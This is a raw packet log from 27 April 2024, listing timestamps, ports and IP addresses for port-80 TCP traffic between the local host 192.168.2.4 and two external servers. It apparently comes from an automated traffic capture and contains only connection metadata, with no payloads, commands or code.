Apr 27, 2024 02:19:10.039876938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.039921999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.039973974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.063906908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.063927889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.064023018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.088627100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.088804960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.106487989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106539965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106587887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106625080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106654882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106715918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106749058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.106751919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106750011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.106797934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.106822014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106865883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.106899977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106937885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.106996059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.107007980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.107022047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.107083082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.107109070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.152760983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.156670094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.156739950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.161127090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.161185026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.161254883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.206702948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.206789017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.209026098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.209101915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.209284067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.209346056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.209981918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.210043907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.210155964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.210216045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.260114908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.260128975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.260334015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.260724068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.260787010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.301744938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.301810026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.301862955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.301872015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.301887035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.301928997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.301953077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.301990032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.302032948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.302094936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.302175045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.302220106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.302225113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.302305937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.302347898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.302354097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.302432060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.302475929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.302484989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.330780029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.330836058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.347810030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.347878933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.356580973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.356693029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.356731892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.378931046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.378947973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.378983974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.379017115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.381103039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.381150007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.382522106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.382564068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.382571936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.382618904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.432605982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.432667971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.432682991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.432845116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.455868006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.456005096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.456058025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.497431993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497447968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497533083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497612000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497627020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.497647047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497677088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.497701883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497742891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.497756004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497839928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497885942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.497890949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.497999907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.498044968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.498111010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.498208046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.498265982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.503005028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.503087997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.544424057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.544533014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.551239014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.551332951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.551342010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.551397085 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.553170919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.553219080 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.553251028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.553301096 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.553308010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.553353071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.553369045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.553411007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.554462910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.554526091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.603445053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.603497982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.603624105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.603624105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.651771069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.651818991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.651952982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.651952982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.674031019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.674104929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.674186945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.674237967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.692342997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.692414999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.692631006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.692783117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.692996979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693038940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693078041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693130016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693208933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693250895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693284988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693322897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693387985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693429947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693463087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693487883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693502903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693536043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693563938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693603992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693635941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693675041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693697929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693738937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.693751097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.693792105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.722851038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.722944021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.723073959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.723073959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.724598885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.724653006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.724669933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.724716902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.725584984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.725626945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.725636005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.725668907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.740761995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.740827084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.751113892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.751127958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.751214981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.751291990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.774629116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.774723053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.844696999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.844815016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.844858885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.846494913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.846534014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.846594095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.846638918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.886985064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.887271881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.887387037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.887392998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.887424946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.887466908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.887743950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.887830973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.887877941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.887943983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.888233900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.888278961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.893824100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.893886089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.893944979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.893963099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.893995047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.894037962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.894045115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.894094944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.894881964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.894932032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.894973993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.895024061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.895651102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.895699024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.895730019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.895778894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.935800076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.945126057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.945188999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.945962906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.946028948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:10.946055889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:10.996428013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.015542030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.015630960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.017714024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.017772913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.042670965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.042716026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.042758942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.042759895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.064353943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.064397097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.064429998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.064448118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.064452887 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.064493895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.065464020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.065514088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.065721035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.065769911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.066507101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.066556931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.066597939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.066644907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.083221912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.083302975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.083339930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.083636045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.083676100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.083745956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.083803892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.083837032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.083849907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.083978891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.084019899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.084290028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.115559101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.115650892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.115688086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.115827084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.137046099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.141527891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.141834974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.141880989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.186281919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.186347961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.187880993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.187932968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.190625906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.230813026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.234900951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.234920979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.234981060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.234997988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.235007048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.235049963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.235860109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.235910892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.235989094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.236037016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.236874104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.236927032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.236951113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.236977100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.236996889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.237205029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.237252951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.278501987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.278561115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.278616905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.278654099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.278726101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.278784037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.278882980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.279071093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.279120922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.279136896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.279201984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.279248953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.279280901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.287002087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.287070036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.324553013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.331026077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.336041927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.336108923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.336138010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.356961012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.356981039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.357033014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.357069016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.358829021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.358908892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.377541065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.405293941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.405359983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.405456066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.405505896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.405536890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.405590057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.406287909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.406322956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.406337976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.406366110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.407166004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.407200098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.407213926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.407244921 CEST	49733	80	192.168.2.4	185.172.128.76
